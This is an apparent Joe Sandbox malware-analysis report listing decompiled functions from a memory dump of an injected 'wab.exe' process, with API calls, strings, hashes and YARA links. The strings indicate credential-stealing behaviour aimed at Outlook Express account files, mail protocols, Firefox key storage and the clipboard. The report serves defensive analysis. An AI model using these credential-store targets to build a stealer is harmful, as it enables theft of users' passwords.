                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpystrlen$memsetsprintf
                                                                                                                                                                                          • String ID: %s (%s)
                                                                                                                                                                                          • API String ID: 3756086014-1363028141
                                                                                                                                                                                          • Opcode ID: 4357e9335d32c2bf08e92843452a3ff925627b6c59b5d6ec26037838f45d6104
                                                                                                                                                                                          • Instruction ID: 49fd0969a141bf365c85b2e85b726abfc67c7a4f8a3ab277a670c68284d415ec
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4357e9335d32c2bf08e92843452a3ff925627b6c59b5d6ec26037838f45d6104
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A1193B1800118AFEB21DF59CD45F99B7ACEF41308F008466FA48EB106D275AB15CB95
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00443683 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00406A9F: CreateFileA.KERNEL32(R7D,80000000,00000001,00000000,00000003,00000000,00000000,0044368E,?,.8D,00443752,?,?,*.oeaccount,.8D,?), ref: 00406AB1
                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,00000000,.8D,00443752,?,?,*.oeaccount,.8D,?,00000104), ref: 0044369D
                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 004436AF
                                                                                                                                                                                          • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004436BE
                                                                                                                                                                                            • Part of subcall function 004072EF: ReadFile.KERNEL32(00000000,?,004436D1,00000000,00000000,?,?,004436D1,?,00000000), ref: 00407306
                                                                                                                                                                                            • Part of subcall function 00443546: wcslen.MSVCRT ref: 00443559
                                                                                                                                                                                            • Part of subcall function 00443546: ??2@YAPAXI@Z.MSVCRT ref: 00443562
                                                                                                                                                                                            • Part of subcall function 00443546: WideCharToMultiByte.KERNEL32(00000000,00000000,004436E8,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004436E8,?,00000000), ref: 0044357B
                                                                                                                                                                                            • Part of subcall function 00443546: strlen.MSVCRT ref: 004435BE
                                                                                                                                                                                            • Part of subcall function 00443546: memcpy.MSVCRT ref: 004435D8
                                                                                                                                                                                            • Part of subcall function 00443546: ??3@YAXPAX@Z.MSVCRT ref: 0044366B
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 004436E9
                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 004436F3
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                                                                                                                                                          • String ID: .8D
                                                                                                                                                                                          • API String ID: 1886237854-2881260426
                                                                                                                                                                                          • Opcode ID: e9accfc59e3ea295214b65d31af1a641a7a6f9c6ce4573a7963a3bdc594cfe72
                                                                                                                                                                                          • Instruction ID: b4a99ca98ea4b9fd05b978b53b3f03ecc28babd8507da3569ede40c7aa85cfb3
                                                                                                                                                                                          • Opcode Fuzzy Hash: e9accfc59e3ea295214b65d31af1a641a7a6f9c6ce4573a7963a3bdc594cfe72
                                                                                                                                                                                          • Instruction Fuzzy Hash: 42012432804248BFEB206F75EC4ED9FBB6CEF46364B10812BF81487261DA358D14CA28
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00408F32 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 00408F5D
                                                                                                                                                                                          • sprintf.MSVCRT ref: 00408F72
                                                                                                                                                                                            • Part of subcall function 0040900D: memset.MSVCRT ref: 00409031
                                                                                                                                                                                            • Part of subcall function 0040900D: GetPrivateProfileStringA.KERNEL32(00451308,0000000A,0044551F,?,00001000,00451200), ref: 00409053
                                                                                                                                                                                            • Part of subcall function 0040900D: _mbscpy.MSVCRT ref: 0040906D
                                                                                                                                                                                          • SetWindowTextA.USER32(?,?), ref: 00408F99
                                                                                                                                                                                          • EnumChildWindows.USER32(?,Function_00008ED5,00000000), ref: 00408FA9
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                                                                                                                                                                          • String ID: caption$dialog_%d
                                                                                                                                                                                          • API String ID: 2923679083-4161923789
                                                                                                                                                                                          • Opcode ID: 000f1f906e92f5b03bb8d936c1600f8ee9725489ffd6e52dafee9c1c18951f52
                                                                                                                                                                                          • Instruction ID: 5193b431d0dc7ecedf7a364b2ddef3fe6b5aec68a3d00ff581056cac6fb231a4
                                                                                                                                                                                          • Opcode Fuzzy Hash: 000f1f906e92f5b03bb8d936c1600f8ee9725489ffd6e52dafee9c1c18951f52
                                                                                                                                                                                          • Instruction Fuzzy Hash: 67F0BB745043487FFB129BA0DD06FC97AA8AB08747F0000A6BB44F11E2DBF899908B5E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00425FE6 Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 281COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • unknown error, xrefs: 00426E65
                                                                                                                                                                                          • cannot release savepoint - SQL statements in progress, xrefs: 004260EE
                                                                                                                                                                                          • abort due to ROLLBACK, xrefs: 00427E1B
                                                                                                                                                                                          • no such savepoint: %s, xrefs: 004260D0
                                                                                                                                                                                          • cannot open savepoint - SQL statements in progress, xrefs: 00426002
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                                          • String ID: abort due to ROLLBACK$cannot open savepoint - SQL statements in progress$cannot release savepoint - SQL statements in progress$no such savepoint: %s$unknown error
                                                                                                                                                                                          • API String ID: 3510742995-3035234601
                                                                                                                                                                                          • Opcode ID: f891372fe87baf48bda125dec3b2232890a750ac063dfed77912f4c4cabfec4f
                                                                                                                                                                                          • Instruction ID: 1b592f7810eb55fdfd9c77514c161e0aeb834189807bd0e5c0ad66af0c508e0f
                                                                                                                                                                                          • Opcode Fuzzy Hash: f891372fe87baf48bda125dec3b2232890a750ac063dfed77912f4c4cabfec4f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4CC15B70A04625DFDB18CFA9E485BA9BBB1FF08304F5540AFE405A7392D738A851CF99
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00441E91 Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 259COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memcpy.MSVCRT ref: 00441F4B
                                                                                                                                                                                            • Part of subcall function 00441A6C: memcmp.MSVCRT ref: 00441AB5
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcmpmemcpy
                                                                                                                                                                                          • String ID: BINARY$NOCASE$RTRIM$main$temp
                                                                                                                                                                                          • API String ID: 1784268899-4153596280
                                                                                                                                                                                          • Opcode ID: 6b6b8ae9c0e91365de8150e640e5bb5f4ec7e5282d2e56bc441d5ca3420a582e
                                                                                                                                                                                          • Instruction ID: db602eaa8e833254b0c0c9be43f42c24c685b457dfa8f14c56b0ec28138b2128
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6b6b8ae9c0e91365de8150e640e5bb5f4ec7e5282d2e56bc441d5ca3420a582e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5091E2B1900700AFE730AF25C981A9EBBE5AB44304F14492FF14697392C7B9A985CB59
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040FB27 Relevance: 9.1, APIs: 6, Instructions: 142COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040F7DE,00000000,?), ref: 0040FB5E
                                                                                                                                                                                          • memset.MSVCRT ref: 0040FBBB
                                                                                                                                                                                          • memset.MSVCRT ref: 0040FBCD
                                                                                                                                                                                            • Part of subcall function 0040FA44: _mbscpy.MSVCRT ref: 0040FA6A
                                                                                                                                                                                          • memset.MSVCRT ref: 0040FCB4
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040FCD9
                                                                                                                                                                                          • CloseHandle.KERNEL32(?,0040F7DE,?), ref: 0040FD23
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3974772901-0
                                                                                                                                                                                          • Opcode ID: 4ad987a4bc41c02407afd48bd51c39f8f43132cb09b5aa7545cf57ad8340978a
                                                                                                                                                                                          • Instruction ID: 4cd0dab2c11de29b1205cc267bdcfe4bbed2ca853fb67bca61950d18440e6937
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4ad987a4bc41c02407afd48bd51c39f8f43132cb09b5aa7545cf57ad8340978a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 79511EB590021CABDB60DF95DD85ADEBBB8FF44305F1000BAE609A2281D7759E84CF69
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00443546 Relevance: 9.1, APIs: 6, Instructions: 96stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • wcslen.MSVCRT ref: 00443559
                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 00443562
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,004436E8,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004436E8,?,00000000), ref: 0044357B
                                                                                                                                                                                            • Part of subcall function 00442878: ??2@YAPAXI@Z.MSVCRT ref: 0044288D
                                                                                                                                                                                            • Part of subcall function 00442878: ??2@YAPAXI@Z.MSVCRT ref: 004428AB
                                                                                                                                                                                            • Part of subcall function 00442878: ??2@YAPAXI@Z.MSVCRT ref: 004428C6
                                                                                                                                                                                            • Part of subcall function 00442878: ??2@YAPAXI@Z.MSVCRT ref: 004428EF
                                                                                                                                                                                            • Part of subcall function 00442878: ??2@YAPAXI@Z.MSVCRT ref: 00442913
                                                                                                                                                                                          • strlen.MSVCRT ref: 004435BE
                                                                                                                                                                                            • Part of subcall function 004429E9: ??3@YAXPAX@Z.MSVCRT ref: 004429F4
                                                                                                                                                                                            • Part of subcall function 004429E9: ??2@YAPAXI@Z.MSVCRT ref: 00442A03
                                                                                                                                                                                          • memcpy.MSVCRT ref: 004435D8
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0044366B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 577244452-0
                                                                                                                                                                                          • Opcode ID: 4370cab8d1ed043324ede4dc3b9a4d06d61cdd8212607e5f6e8765e25bb93f57
                                                                                                                                                                                          • Instruction ID: ed198900897cbedb477538fc3de06edee324e7a25cf08c3aedaf46951cf6a217
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4370cab8d1ed043324ede4dc3b9a4d06d61cdd8212607e5f6e8765e25bb93f57
                                                                                                                                                                                          • Instruction Fuzzy Hash: 14318672804219AFEF21EF65C8819DEBBB5EF45314F5480AAF108A3200CB396F84DF49
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00404469 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 75COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00406CA4: strlen.MSVCRT ref: 00406CA9
                                                                                                                                                                                            • Part of subcall function 00406CA4: memcpy.MSVCRT ref: 00406CBE
                                                                                                                                                                                          • _strcmpi.MSVCRT ref: 004044FA
                                                                                                                                                                                          • _strcmpi.MSVCRT ref: 00404518
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _strcmpi$memcpystrlen
                                                                                                                                                                                          • String ID: imap$pop3$smtp
                                                                                                                                                                                          • API String ID: 2025310588-821077329
                                                                                                                                                                                          • Opcode ID: 4172489bfdd0b02c38134a290eb16c247b5a863f83d9230e12e3431aa9a1b902
                                                                                                                                                                                          • Instruction ID: ee17be80c36da3591ff53c386c7625c128025028662cc5e87d89578f4f8b6d75
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4172489bfdd0b02c38134a290eb16c247b5a863f83d9230e12e3431aa9a1b902
                                                                                                                                                                                          • Instruction Fuzzy Hash: C42196B25046189BEB51DB15CD417DAB3FCEF90304F10006BE79AB7181DB787B498B59
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040BD68 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 72COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 0040BD88
                                                                                                                                                                                            • Part of subcall function 00408B27: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408BF0
                                                                                                                                                                                            • Part of subcall function 00408B27: memcpy.MSVCRT ref: 00408C2F
                                                                                                                                                                                            • Part of subcall function 00408B27: _mbscpy.MSVCRT ref: 00408BA2
                                                                                                                                                                                            • Part of subcall function 00408B27: strlen.MSVCRT ref: 00408BC0
                                                                                                                                                                                            • Part of subcall function 00407446: memset.MSVCRT ref: 00407466
                                                                                                                                                                                            • Part of subcall function 00407446: sprintf.MSVCRT ref: 00407493
                                                                                                                                                                                            • Part of subcall function 00407446: strlen.MSVCRT ref: 0040749F
                                                                                                                                                                                            • Part of subcall function 00407446: memcpy.MSVCRT ref: 004074B4
                                                                                                                                                                                            • Part of subcall function 00407446: strlen.MSVCRT ref: 004074C2
                                                                                                                                                                                            • Part of subcall function 00407446: memcpy.MSVCRT ref: 004074D2
                                                                                                                                                                                            • Part of subcall function 00407279: _mbscpy.MSVCRT ref: 004072DF
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                                                                                                                                                          • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                                                          • API String ID: 2726666094-3614832568
                                                                                                                                                                                          • Opcode ID: dc175560a6198b9798b44ce5f971e01ac777fcc381b56c1877e1d198c2103063
                                                                                                                                                                                          • Instruction ID: 9cc38d581f61d2a6594629c27ef9ad5a8c62d4d42b688fbaa09f609bba3e4d8d
                                                                                                                                                                                          • Opcode Fuzzy Hash: dc175560a6198b9798b44ce5f971e01ac777fcc381b56c1877e1d198c2103063
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0121FBB1C002599ADB40EFA5D981BDDBBB4AB08308F10517EF548B6281DB382A45CB9E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00403A53 Relevance: 9.1, APIs: 6, Instructions: 56filestringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 00403A78
                                                                                                                                                                                          • memset.MSVCRT ref: 00403A91
                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF), ref: 00403AA8
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403AC7
                                                                                                                                                                                          • strlen.MSVCRT ref: 00403AD9
                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403AEA
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ByteCharMultiWidememset$FileWritestrlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1786725549-0
                                                                                                                                                                                          • Opcode ID: e58b70ba74cd0776df0cd714b6ebe3d4fb4c03e2cd7b5e97725e455eaa9c95ba
                                                                                                                                                                                          • Instruction ID: 3c11530c7ff43e2cab0ee1a3c4b7d34204fc8064c5823527b9b114d7af9e1f20
                                                                                                                                                                                          • Opcode Fuzzy Hash: e58b70ba74cd0776df0cd714b6ebe3d4fb4c03e2cd7b5e97725e455eaa9c95ba
                                                                                                                                                                                          • Instruction Fuzzy Hash: 50112DBA80412CBFFB10AB94DC85EEBB3ADEF09355F0001A6B715D2092D6359F548B78
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040BE9E Relevance: 9.1, APIs: 6, Instructions: 54fileclipboardCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetTempPathA.KERNEL32(00000104,?), ref: 0040BEB8
                                                                                                                                                                                          • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040BECA
                                                                                                                                                                                          • GetTempFileNameA.KERNEL32(?,00446634,00000000,?), ref: 0040BEEC
                                                                                                                                                                                          • OpenClipboard.USER32(?), ref: 0040BF0C
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0040BF25
                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000), ref: 0040BF42
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2014771361-0
                                                                                                                                                                                          • Opcode ID: f1e64fb6be10128bbee6f3e595a742589036f7cac5447e39c680a47d04657e65
                                                                                                                                                                                          • Instruction ID: 907fbb9bc954c15d9eb0ad6f98a85717611d4d669dd49ad048df0fde8b6b2f4b
                                                                                                                                                                                          • Opcode Fuzzy Hash: f1e64fb6be10128bbee6f3e595a742589036f7cac5447e39c680a47d04657e65
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5B11A1B6900218ABDF20AB61DC49FDB77BCAB11701F0000B6B685E2092DBB499C48F68
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00406113 Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 51COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memcmp.MSVCRT ref: 00406129
                                                                                                                                                                                            • Part of subcall function 00406057: memcmp.MSVCRT ref: 00406075
                                                                                                                                                                                            • Part of subcall function 00406057: memcpy.MSVCRT ref: 004060A4
                                                                                                                                                                                            • Part of subcall function 00406057: memcpy.MSVCRT ref: 004060B9
                                                                                                                                                                                          • memcmp.MSVCRT ref: 00406154
                                                                                                                                                                                          • memcmp.MSVCRT ref: 0040617C
                                                                                                                                                                                          • memcpy.MSVCRT ref: 00406199
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcmp$memcpy
                                                                                                                                                                                          • String ID: global-salt$password-check
                                                                                                                                                                                          • API String ID: 231171946-3927197501
                                                                                                                                                                                          • Opcode ID: e64782263ff5605526e0fe757cea6ed3191f710ccf3b0afa5e67e353afe61262
                                                                                                                                                                                          • Instruction ID: 655c6eb068c7835b63414ef3c9938ae25085d91347c247b77763f6b5778615a8
                                                                                                                                                                                          • Opcode Fuzzy Hash: e64782263ff5605526e0fe757cea6ed3191f710ccf3b0afa5e67e353afe61262
                                                                                                                                                                                          • Instruction Fuzzy Hash: E301D8B954070466FF202A628C42B8B37585F51758F024137FD067D2D3E37E87748A4E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00442960 Relevance: 9.0, APIs: 6, Instructions: 46COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                                          • Opcode ID: 61b661c510ad4b0743117b2440ebaa6c68aec67bf7d0c3759525eee1844cf9ab
                                                                                                                                                                                          • Instruction ID: 5b630ca211e00ee6ab232d4f5fe81ba50f7f923f282134244f429d4b925a3085
                                                                                                                                                                                          • Opcode Fuzzy Hash: 61b661c510ad4b0743117b2440ebaa6c68aec67bf7d0c3759525eee1844cf9ab
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7501A272E0AD31A7E1257A76554135BE3686F04B29F05024FB904772428B6C7C5445DE
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00401693 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 004016A2
                                                                                                                                                                                          • GetSystemMetrics.USER32(00000015), ref: 004016B0
                                                                                                                                                                                          • GetSystemMetrics.USER32(00000014), ref: 004016BC
                                                                                                                                                                                          • BeginPaint.USER32(?,?), ref: 004016D6
                                                                                                                                                                                          • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E5
                                                                                                                                                                                          • EndPaint.USER32(?,?), ref: 004016F2
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 19018683-0
                                                                                                                                                                                          • Opcode ID: d93d450dc478f7866c229f4a037813e0caab4cabbf567c971482d52d831a5164
                                                                                                                                                                                          • Instruction ID: 724a62348f30ed3062fc78c586e299175c66965872e24402369681ac2eeab922
                                                                                                                                                                                          • Opcode Fuzzy Hash: d93d450dc478f7866c229f4a037813e0caab4cabbf567c971482d52d831a5164
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0701FB76900619AFDF04DFA8DC499FE7BBDFB45301F00046AEA11AB295DAB1A914CF90
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040C319 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 162windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • DestroyWindow.USER32(?), ref: 0040C352
                                                                                                                                                                                          • SetFocus.USER32(?,?,?), ref: 0040C3F8
                                                                                                                                                                                          • InvalidateRect.USER32(?,00000000,00000000), ref: 0040C4F5
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DestroyFocusInvalidateRectWindow
                                                                                                                                                                                          • String ID: XgD$rY@
                                                                                                                                                                                          • API String ID: 3502187192-1347721759
                                                                                                                                                                                          • Opcode ID: 0547b1f3527a77a0dd6e05b9ba2639b12fbf26f65146718a21d2de361d27d990
                                                                                                                                                                                          • Instruction ID: f774ea8d8eb1800fd2ad86f321479c1d669f6cdc6fcff53b53818c93aeeaee42
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0547b1f3527a77a0dd6e05b9ba2639b12fbf26f65146718a21d2de361d27d990
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6F518630A04701DBCB34BB658885D9AB3E0BF51724F44C63FF4656B2E2C779A9818B8D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004062D9 Relevance: 8.9, APIs: 7, Instructions: 157COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 00406376
                                                                                                                                                                                          • memcpy.MSVCRT ref: 00406389
                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040639C
                                                                                                                                                                                            • Part of subcall function 00404883: memset.MSVCRT ref: 004048BD
                                                                                                                                                                                            • Part of subcall function 00404883: memset.MSVCRT ref: 004048D1
                                                                                                                                                                                            • Part of subcall function 00404883: memset.MSVCRT ref: 004048E5
                                                                                                                                                                                            • Part of subcall function 00404883: memcpy.MSVCRT ref: 004048F7
                                                                                                                                                                                            • Part of subcall function 00404883: memcpy.MSVCRT ref: 00404909
                                                                                                                                                                                          • memcpy.MSVCRT ref: 004063E0
